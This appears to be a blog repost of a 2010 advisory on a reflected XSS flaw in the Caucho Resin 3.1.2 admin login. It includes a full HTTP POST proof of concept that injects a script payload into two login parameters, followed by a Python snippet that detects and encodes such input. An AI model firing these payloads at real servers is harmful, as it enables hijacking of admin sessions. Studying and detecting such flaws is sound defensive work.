♺ Google is the best teacher ♺ | University of Gunadarma IT ☺

Caucho Resin web server 3.1.2 Admin Login XSS Vulnerability

# Exploit Title: Caucho Resin web server 3.1.2 Admin Login digest_username & digest_realm XSS Vulnerability
# Date: 2010-05-17
# Author: flyh4t
# Software Link: http://www.caucho.com/
# Version: Professional 3.1.2
# CVE : no



PoC (no login required):



POST /resin-admin/ HTTP/1.1
Accept: */*
Referer: http://1.1.1.1/resin-admin/
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; msn OptimizedIE8;ZHCN)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: 1.1.1.1
Content-Length: 194
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: JSESSIONID=abc7CGMIyBwpNgFko8MIs

digest_username=aaa%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%3C%22&digest_password1=&digest_password2=&digest_realm=aaa%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%3C%22&digest_attempt=true
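
Added example (not part of the original advisory, and not Caucho's code): a defender-side check that flags markup characters in the two reflected parameters of a login POST body, next to the output encoding that neutralizes them. The helper names, the benign sample body, and the assumption that the value is echoed into a double-quoted HTML attribute are illustrative.

```python
import html
from urllib.parse import parse_qs

# Parameters the advisory names as reflected by the admin login page.
REFLECTED_PARAMS = ("digest_username", "digest_realm")
# Characters that let a value break out of a quoted HTML attribute.
BREAKOUT_CHARS = set("\"'<>")

# Request body from the advisory above, joined onto one logical line.
ADVISORY_BODY = (
    "digest_username=aaa%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%3C%22&"
    "digest_password1=&digest_password2=&"
    "digest_realm=aaa%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%3C%22&"
    "digest_attempt=true"
)
# Constructed benign login attempt, for comparison.
BENIGN_BODY = ("digest_username=admin&digest_password1=&digest_password2=&"
               "digest_realm=resin&digest_attempt=true")


def suspicious_params(body: str) -> dict:
    """Return {param: decoded value} for reflected params that carry markup characters."""
    fields = parse_qs(body, keep_blank_values=True)
    hits = {}
    for name in REFLECTED_PARAMS:
        for value in fields.get(name, []):
            if BREAKOUT_CHARS & set(value):
                hits[name] = value
    return hits


def render_input(name: str, value: str) -> str:
    """Hypothetical template helper: HTML-encode the value before echoing it
    into a double-quoted attribute (assumed reflection context)."""
    return '<input name="%s" value="%s">' % (
        html.escape(name, quote=True), html.escape(value, quote=True))


if __name__ == "__main__":
    for label, body in (("advisory", ADVISORY_BODY), ("benign", BENIGN_BODY)):
        hits = suspicious_params(body)
        print(label, "->", "flagged: " + ", ".join(hits) if hits else "clean")
        for name, value in hits.items():
            print("  encoded reflection:", render_input(name, value))
```
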




References: http://securityreason.com/wlb_show/WLB-2010050108
Posted: May 20, 2010